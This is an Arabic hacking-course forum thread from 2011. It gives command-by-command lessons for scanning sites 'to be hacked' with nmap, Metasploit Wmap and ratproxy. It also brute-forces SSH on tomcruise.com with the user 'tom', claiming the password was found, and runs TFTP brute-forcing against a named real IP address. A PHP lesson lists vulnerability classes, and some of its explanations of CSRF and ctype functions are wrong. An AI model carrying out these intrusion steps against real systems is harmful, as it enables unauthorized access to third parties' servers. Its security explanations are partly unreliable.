nmap -v -sV [ip] -oA subnet_1

طبعا بدل كلمة ال [ip] للهدف المراد اختراقة

وكمل باقى الاوامر

db_import_nmap_xml subnet_1.xml

بعدين افتح تريمنال جديد واكتب فيه الاوامر التاليه علشان نخلى اداة ال Dradis تتعرف على النتايج الى ظهرت

cd /pentest/misc/dradis/client

ruby ./dradis.rb


import nmap /pentest/exploits/framework3/subnet_1.nmap normal

دلوقت نفتح الاداة عن طريق المتصفح هنلاقيها اتعرف على النتايج الى ظهرت لنا
زى ما انتو شايفين ان البرنامج نظم النتايج فى tree او نظام شجرى فى العرض ودة مفيد جدا لو بتعمل سكان على سرفر كبيير بتحتاج نظام فى النتايج وطريقة عرضها لانك هتلاقى نتايج كتيير

دلوقت هنشتغل على الاضافة الثانية وهى ال Wmap

طيب افتح تريمنال جديد وادخل على المسار دة /pentest/exploits/framework3

واكتب الاوامر دى علشان نثبت برنامج ال ratproxy

wget http://ratproxy.googlecode.com/files...xy-1.58.tar.gz

tar -zxvf ratproxy-1.58.tar.gz

cd ratproxy

patch -d . < /pentest/exploits/framework3/external/ratproxy/ratproxy_wmap.diff

make

دلوقت شغل الميتا سبلويت واكتب الاوامر دى بالترتيب

db_create wmap.db

load db_wmap

db_connect wmap.db

دلوقت افتح تريمنال جديد وادخل على المسار دة

/pentest/w3b/ratproxy شيل ال 3 وحط مكانها e

واكتب الامر دة

/ratproxy -v /pentest/exploits/framework3/ -b wmap.db

الامر دة علشان نشغل ال rat proxy بكل سهولة

طيب نيجى لحتة الحلوة فى الموضوع ندخل على الموقع المراد اختراقة وكل الى علينا نتصفحة بس مش اكتر ولازم بس تقعد شوية فى الموقع وتدخل على اكثر كم من الصفحات فيه

دلوقت بعد ما تخلص تصفح للموقع ندخل على الميتا وندى الاوامر دى

wmap_targets -r > علشان نشوف اذا اتعرف على الايبى بتاع الموقع او لا
wmap_targets -p
wmap_targets -s 1
wmap_w3bsite > هيطلع ال structure او البنية بتاعت الموقع
wmap_run -t > الامر ده علشان البرنامج يبتدى يشتغل ويستخدم ال auxiliary الموجودة فى الميتا سبلويت عموما دى بتاخد وقت جامد وممكن تعدى منauxiliary للى بعدها بانك تضغط على "control-c"
wmap_run -e

دلوقت بعد ما خلص نبتدى نشوف النتايج
wmap_reports
wmap_reports -p
wmap_reports -s 1

بكدة نكون عرفنا عمل ال Proxies يعنى لو تلاحظوا هنا انا استخدمت ال ratproxy + wmap مع بعض علشان افحص عن طريق التصفح ودى ممكن تعملها لو شاكك ان فى صفحة مثلا فيها ثغرة وانت استخدمت سكانر عادى ومطلعش معاك حاجة
طيب هل ممكن انى استخدم اداة ال wmap بدون الrat proxy
نقول اكيد طبعا
تابعوا معى


كود PHP:

msf> db_create wmap_test
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: wmap_test

msf > load db_wmap
[*] =[ WMAP v0.6 - et [ ] m3tasploit.com
[*] Successfully loaded plugin: db_wmap

دلوقت نحدد الموقع الى هنعمل عليه فحص زى كدة


كود PHP:



msf > wmap_targets -ahttp://www.example.com/
[*] Added target [url]]www.example.com[/url] 80 0
[*] Added request [url]]www.example.com[/url]

msf > wmap_targets -p
[*] Id. Host Port SSL
[*] 1. [url]]www.example.com[/url] 80

msf > wmap_targets -s 1

msf > wmap_targets -p
[*] Id. Host Port SSL
[*] => 1. [url]]www.example.com[/url] 80


طبعا بدل http://www.example.comحط رابط الهدف

دلوقت شغل الاداة


كود PHP:



msf > wmap_run -t
[*] Loaded auxiliary/admin/http/tomcat_administration ...
[*] Loaded auxiliary/admin/http/tomcat_manager ...
[*] Loaded auxiliary/scanner/http/frontpage_login ...
[*] Loaded auxiliary/scanner/http/options ...
[*] Loaded auxiliary/scanner/http/version ...
[*] Loaded auxiliary/scanner/http/wmap_cert ...
[*] Loaded auxiliary/scanner/http/wmap_robots_txt ...
[*] Loaded auxiliary/scanner/http/wmap_soap_xml ...
[*] Loaded auxiliary/scanner/http/wmap_ssl ...
[*] Loaded auxiliary/scanner/http/wmap_svn_scanner ...
[*] Loaded auxiliary/scanner/http/wmap_verb_auth_bypass ...
[*] Loaded auxiliary/scanner/http/wmap_vhost_scanner ...
[*] Loaded auxiliary/scanner/http/wmap_***dav_internal_ip ...
[*] Loaded auxiliary/scanner/http/wmap_***dav_scanner ...
[*] Loaded auxiliary/scanner/http/wmap_***dav_***site_content ...
[*] Loaded auxiliary/scanner/http/ms09_020_***dav_unicode_bypass ...
[*] Loaded auxiliary/scanner/http/wmap_backup_file ...
[*] Loaded auxiliary/scanner/http/wmap_brute_dirs ...
[*] Loaded auxiliary/scanner/http/wmap_copy_of_file ...
[*] Loaded auxiliary/scanner/http/wmap_dir_listing ...
[*] Loaded auxiliary/scanner/http/wmap_dir_scanner ...
[*] Loaded auxiliary/scanner/http/wmap_dir_***dav_unicode_bypass ...
[*] Loaded auxiliary/scanner/http/wmap_file_same_****_dir ...
[*] Loaded auxiliary/scanner/http/wmap_files_dir ...
[*] Loaded auxiliary/scanner/http/wmap_prev_dir_same_****_file ...
[*] Loaded auxiliary/scanner/http/wmap_replace_ext ...
[*] Loaded auxiliary/scanner/http/writable ...
[*] Loaded auxiliary/scanner/http/wmap_blind_sql_query ...
[*] Loaded auxiliary/scanner/http/wmap_error_sql_injection ...


بعدها اسنخدم الامر دة علشان تشوف الملاحظات على الموقع او يعنى الثغرات المشكوك فيها
db_notes

والامر ده علشان يديلك قائمة ل Vluns على الهدف
db_vulns

لحد هنا نكون وصلنا لاخر درسنا النهاردة وياريت يكون مفهوم
وياريت متعدوش حرف الا وانت فاهمه كويس لان جمع المعلومات هى اهم مرحلة فى عمليات الاختراق

<FONT FACE="Arial" SIZE="5" COLOR="#00FF00"> This <‎/FONT>






الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://alfateh.yoo7.com
ابو عمار
المراقب العام
المراقب العام
avatar

عدد الرسائل : 1406
العمر : 34
سمعاتك وشهرتك : 2
تاريخ التسجيل : 04/10/2008

تسميتك
مجموعة كل فلسطيني : المنتدى جميل

مُساهمةموضوع: رد: دورة الهكـــــــــــــــــــــــــــــــــــر   الجمعة يوليو 22, 2011 7:36 am


فى الدروس الى فاتت عرفنا ازاى نطلع المعلومات الخاصة بالهدف باستخدام اكتر من اداه طبعا لازم نستغل المعلوماات دى فاول حااجة من الاستغلال هى درسنا اليوم !

اليوم باذن الله هنتكلم عن اساسيات التخمين !!

التخمين او ال bruteforce يعتبر واحد من اقوى العمليات المساعدة فى الاختراق حيث انك اما بتخمن الباس ويكون معاك اليوزر او العكس واحيانا الاتنين معا !

درسنا النهاردة خفيف قوى وباذن الله يكون مفهوم

بسم الله نبداء :-

اول اداة هنستعملها هيا اداة ال Brutessh لتخمين باسورد ال SSh لحساب الادمن او اى يوزر على السرفر له حساب SSH

طيب نبداء الشغل على بركة الله

الاول افتح تريمنال جديد وبعدين ندخل على مسار الاداة الى هو


كود PHP:


/pentest/passwords/brutessh

بالامر

كود PHP:


cd /pentest/passwords/brutessh


طيب بكدة دخلنا على مسار الاداة دلوقت نشوف ملفاتها عن طريق الامر


كود PHP:

ls -la
هتظهر ملفات الاداة

دلوقت نشغل الاداة ونشوف الاوامر بتاعتها بالامر


كود PHP:

./brutessh

طيب دلوقت نجرب نشغل الاداة على موقع tomcruise.com مثلا الموقع الرسمى للفنان توم كروز ولنفترض ان اليوزر الى هنخمن عليه هو tom طيب دلوقت ناقصنا حاجة واحدة هيا ورد ليست انا هنا هستخدم ورد ليست تبع اداة ال SSHAttER ودى موجودة جاهزة فى الجهاز انما لو عاوزين تثبتوا اى ورد ليست خارجى يبقى احفظة على الجهاز وخليك فاكر المسار بتاعها

طيب نشوف الامر المستخدم


كود PHP:

./brutessh.py -h tomcruise.com -u tom -d /pentest/passwords/sshatter/passwords
دلوقت نوضح الامر ببساطة

اسم الموقع هوtomcruise.com واليوزر tom اما مسار الود ليست الى انا هستخدمها فى التخمين هيا

كود PHP:

/pentest/passwords/sshatter/passwords
طيب نطبق الامر فى الاداة ونشوف الناتج
وزى ما انتو شايفين طلع لنا الباس بتاعه عن طريق التخمين

دلوقت خلصنا شرح اول اداة

تانى اداة عندنا هيا اداة ال SShAtter ودى انا عملت ليها شرح وموضوع خاص قبل كدة هنا


وهتلاقوها جاهزة عندكم فى النسخة على المسار دة


كود PHP:

/pentest/passwords/sshatter


بكدة نكون شرحنا اداتين لعمل تخمين على خدمات ال ssh !

دلوقت ندخل على ادوات تخمين لخدمة ال Tftp ودى واحدة من خدمات ال FTP فى الغالب بتلاقيها فى سرفرات الويندوز لاكن ممكن تلاقى بعض سرفرات اللينكس مفعلة الخدمة عادى وهنستخدم اداة اسمها ftp-bruteforce

طيب دلوقت ندخل على مسار الاداة من الامر ده


كود PHP:

cd /pentest/passwords/tftp-bruteforce

ونشغل الاداة بالامر ده


كود PHP:

./tftpbrute.pl

ولازم تراعى الحروف بانك تكتبها زى ما هيا

نشوف الناتج
دلوقت نجرب نشغل الاداة على موقع توم كروز برضو ودة الايبى بتاع الموقع 72.167.39.133

ونشوف النتائج الاول نشوف الامر المستعمل :-


كود PHP:

./tftpbrute.pl 72.167.39.133 /pentest/passwords/tftp-bruteforce/brutefile.txt 100

طيب زى ما انتو شايفين هنا الاول شغلنا الاداة بعيدن حطينا الايبى المستهدف بعدها حطينا مسار الورد ليست الى هنستعملها

بعدها تستنى الاداة لما تشتغل ونشوف النتايج!


تمام

اتمنى الدرس يكون مفهوم لحد هنا !


معنى كلمة تخمين مش بس تخمين بعض الباسوردات انما دى هيا السمة المشهورة ليها !

التخمين ممكن تستعملها فى كسر الباس وردات تنعرف على مسارات الملفات وتتعرف كمان على السب دومينز لدومين معين كل ده واكتر تحت كلمة التخمين او ال bruteforce

نسخة الباك تراك الجديدة بتدعم العديد من الادوات القوية جدا فى العملية دى زى مثلا

كود PHP:

brutessh
crunch
cupp
dns-bruteforce
jtr
lodowep
rarcrack
rcrack
rww-attack
saltymd5
samdump2
sshatter
tftp-bruteforce
vncrack
wyd
لحد كدة اعقتد عرفنا اساسيات التخمين وبالنسبة للادوات الموجودةفى النسخة فدى فيها ادوات لفك التشفير وادوات تانى لعمليات التخمين المختلفة

عموما اتمنى منكم تجربوهم وكلهم موجودين على المسار ده


كود PHP:

/pentest/passwords
طيب بالنسبة لموضوع الورد ليستس فدى هتلاقوا ورد ليست خاصة بفريق دارك كود على المسار ده


كود PHP:

/pentest/passwords/wordlists

باسم darkc0de.lst ودى ممكن تستعملها مع اى اداة وللعلم فى اداوات كتيير هتلاقى معاها الورد ليستس الخاصة بيها

وممكن تضيف ورد ليستس زى ما انت عاوز

<FONT FACE="Arial" SIZE="5" COLOR="#00FF00"> This <‎/FONT>






الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://alfateh.yoo7.com
ابو عمار
المراقب العام
المراقب العام
avatar

عدد الرسائل : 1406
العمر : 34
سمعاتك وشهرتك : 2
تاريخ التسجيل : 04/10/2008

تسميتك
مجموعة كل فلسطيني : المنتدى جميل

مُساهمةموضوع: رد: دورة الهكـــــــــــــــــــــــــــــــــــر   الجمعة يوليو 22, 2011 7:37 am


فى الدروس الى فااتت درسنا طرق التخفى ثم جمع المعلومات ثم درسنا اساسيات التخمين على الخدمات كوسيلةى للدخول على الموقع ؟!

طيب لو التخمين لم يجدى نفعا هنعمل ايه ؟

فى الحالة دى هندور على الثغرات الموجودة فى الاول فى السكربتات على الموقع المصاب علشان نستغلها ونصلب بيها للهدف بتاعنا !

درسنا النهاردة هنتكلم فيه عن ثغرات ال php وبعض الدوال المشهورة ليها !

بصراحة كنت ناوى انزل طرق الاكتشافات على طوول لاكن لقيت ان منت الافضل انى اعمل شرح صغير ونظرى عن الثغرات دى انواعها وفوائدها > وده موضوعنا النهاردة باذن الله !

بسم الله نبداء :-
--------------------

ثغرات ال php متعددة وانا لما بقول ثغرات ال php اقصد بيها الثغرات المصابة بيها السكربتات المكتوبه بالغة دى !

طيب نبتدى مع بعض فى تفصيل انواع الثغرات او على الاقل المشهورة منها :-

1-Cross Site Scripting (XSS)

الثغرة دى بتسمح بحقن البيانات فى صفحات الويب المصابة وفى الغالب ما بيكون استغلالها ككود يتم وضعة فى المتصفح وتطبيقة من عند المخترق وحقنة فى صفحة ويب

حاليا ليها تطورات جديدة ولاكن مع الاسف تعتبر ثغرات مهمله رغم قوتها الفائقة !!!!

2-Cross Site Request Forgery (CSRF)

والثغرات دى عموما بيتم فيها خداع جهاز الضحية وتوجيهة لتطبيق الويب المصاب !
اما عن خطورتها فاقصى خطوره ليها هى قراءة ملفات السرفر باستخدام بعض الادوات المساعدة !

3-Data Base Injection

ودى طبعا غنية عن التعربف وتعتبر اكثر الثغرات انتشارا فى الوقت الحالى لكل انواع قواعد البيانات
بانواعها سواء sql , MSSQl .Oracel او غيره ودى الثغرات الى بيتم فيها اما استعراض جداول قواعد البيانات او حقن اى داتا فى الجداول دى !

4-Insecure Session Handling

وده نوع من الثغرات بيصاب بيه التطبيقات او السكربتات الى بتعتمد على الجلسات او ال Session

حيث ان عدم تامين الجلسة او ال Session بيؤدى لان المهاجم يقدر انو يسيطر على ال Session ويطلع على بيانات جديدة او ان يدخل لوحات التحكم وهكذا !

5- Session Fixation

ودى الثغرات الى بتسمح للمهاجم ان يسيطر على Session كامل عن طريق حقن معرف خاص بيه او token بدل ال token الاصلى لل Session وبكدة يقدر انو يسيطر على ال Session كله !

6- Information Disclosure

والثغرات دى بتسمح جمع معلومات حساسة من تطبيق الويب المصاب ممكن تتسبب فى تسهيل مهمة المهاجم فى الاختراق !

7- Header Injection

وده نووع قوى من الثغرات بيعتمد على حقن كود خبيث فى ال Header بتاع الريكويست تبع ال HTTP

بعدها تظهر النتيجة على الرد بتاع الريكويست من ال HTTP وللاسف النوع ده غير منتشر لاكنوا الاقوى فى رائ شخصيا وهنعرف ليه مع الوقت !

8- File Inclusion

ودى بمعنى حقن الملفات او ادخالها لتطبيق ويب معين سواء عن بعد او ملفات لوكال ودى الثغرات الاسهل لاكنها للاسف اخده فى الانقراض !

9- Insecure Configuration

ودى ثغرات ناتجة من عدم تامين ال config بتاع السرفر و بتسهل للمهاجم الحصول على معلومات حساسة من السرفر لاكنها للاسف غير منتشرة بالمرة

10- Weak randomness
النوع ده من الثغرات موجود بشكل اقتراضى فقط حاليا وهو بينتج من سوء التعامل مع دوال الازمة للانتاج الارقام العشوائية فى تطبيقات الويب الى بتعتمد على ارقام عشوائية بدل من الروابط .
وممكن منه تدخل لوحة التحكم بكل سهوله من غير اى تعقيدات !


دوول اشهر 10 انواع من ثغرات ال PHP لاكن فى انواع تانى كتيير انما غير مشهورة وصعبة فى الاستغلال ولان الدورة فى الاساس للمبتدئين انا محبتش انى اصعبها عليكم !

طيب ازاى ممكن تتوقع ان التطبيق الموجود قدامك مصاب بثغرة من الثغرات دى ؟!

فى الاول انت بتدرس طريقى عمل التطبيق وتشوفه بيعتمد على ايه يعنى على قواعد ببيانات مثلا يبقى اكيد فيه ثغرةخاصة بقواعد البيانات او مثلا بيعتمد على المتغيرات فقط يبقى فيه ثغرات من الثغرات بتاعت المتغيرات !

طيب دلوقت ندخل على الدوال المتعلقة بالامن فى لغة ال PHP

ال PHP لغة برمجة كبييرة بتعتمد على دوال كثيير جدا فى عمليه التامين لاكن هنا باذن الله انا هتكلم عن اشهر الدوال دى

بسم الله نبداء :-

الاول هبنداء مع دوال التحقق من الوظائف او ال Validation and Sanitising Functions

اول انواع الدوال دى هى ال CType او دوال الى بتعتمد على ال CType


ctype_alnum() ودى بتتاكد ان الداتا المدخله ضمن الارقام 0-9 ومن a-z

ctype_alpha() ودى بتتاكد ان الداتا المدخلة من A-Z, a-z

ctype_cntrl() ودى بتعمل تحكم للداتا المدخلة على حسب ما بصر مدير النظام

ctype_digit() ودى بتشتغل على الارقام من 0-9

ctype_graph() ودى مسؤلة عن الاظهار الصورى للنتائج

ctype_lower() ودى مسؤله عن الحروف الصغيرة من a-z

ctype_print() مسؤله عن عمليات الطبع

ctype_punct() ودى المسؤله عنت علمات الترقيم

ctype_space() ودى مسؤله عن المسافات ما بين الكلمات او ال whitespace

ctype_upper() ودى مسؤله عن الحروف الكبييرة او ال uppercase من A-Z

ctype_xdigit() ودى مسؤله عن الارقام والحروف المعتمدة فى بيئة ال hexadecimal الى هم 0-9, a-f, A-F

اما الشكل البرمجى للدوال دى بيكون زى كدة


كود PHP:

if (!ctype_print($_GET['var'])) {
die("User input contains non-printable characters");
}

بعد كده فى دوال تانى زى دوال الفلترة والتشفير وغيرة لاكن معقدين شوية وباذن الله هنتكلم عنهم فى وقتهم

لحد هنا درسنا اليوم انتهى !


*********

وباذن الله الدروس القادمه هنتعلم كيفيه اكتشاف الثغرات فى بيئة ال php وكيفية استغلالها بدون مشاكل باذن الله !

<FONT FACE="Arial" SIZE="5" COLOR="#00FF00"> This <‎/FONT>






الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://alfateh.yoo7.com
ابو عمار
المراقب العام
المراقب العام
avatar

عدد الرسائل : 1406
العمر : 34
سمعاتك وشهرتك : 2
تاريخ التسجيل : 04/10/2008

تسميتك
مجموعة كل فلسطيني : المنتدى جميل

مُساهمةموضوع: رد: دورة الهكـــــــــــــــــــــــــــــــــــر   الجمعة يوليو 22, 2011 7:38 am


اليوم باذن الله درسنا السابع

الدرس فديو

>> اعذرونا على الغلطات الاملائية لان الكيبورد بايظ

عموما الشرح المرة دى على الويندوز مش لينكس


حمل الشرح من هنا
4shared.com/file/r0FLyMCH/SinaRitx_V4-team.html

تحياتى

<FONT FACE="Arial" SIZE="5" COLOR="#00FF00"> This <‎/FONT>






الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://alfateh.yoo7.com
anta heek
العضو المميز
العضو المميز
avatar

فلسطين

عدد الرسائل : 61
العمر : 25
سمعاتك وشهرتك : 2
تاريخ التسجيل : 12/12/2011

مُساهمةموضوع: رد: دورة الهكـــــــــــــــــــــــــــــــــــر   الإثنين ديسمبر 12, 2011 4:01 pm

مبدع ويعطيك العافيه على الجهد الكبير

<FONT FACE="Arial" SIZE="5" COLOR="#00FF00"> This <‎/FONT>






 Smile صفحتي ع الفيس بوك ^_^  
https://www.facebook.com/cover.for


الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
anta heek
العضو المميز
العضو المميز
avatar

فلسطين

عدد الرسائل : 61
العمر : 25
سمعاتك وشهرتك : 2
تاريخ التسجيل : 12/12/2011

مُساهمةموضوع: رد: دورة الهكـــــــــــــــــــــــــــــــــــر   الإثنين ديسمبر 12, 2011 4:04 pm

اخي بس لو اتخلي بقرص احسن او في ملف مضغووط بكون احسن عنجد كل الاحترام

<FONT FACE="Arial" SIZE="5" COLOR="#00FF00"> This <‎/FONT>






 Smile صفحتي ع الفيس بوك ^_^  
https://www.facebook.com/cover.for


الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
 
دورة الهكـــــــــــــــــــــــــــــــــــر
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
حياة الفتح  :: برامج كمبيوتر جديده - توبيكات جديده - ماسنجر - تحميل برامج - جديد البرامج - توبيكات منوعه :: برامج كمبيوتر - برامج حمايه - خلفيات سطح المكتب - خلفيات منوعه :: عالم الكمبيوتر :: عالم الهكر والاختراق-
انتقل الى: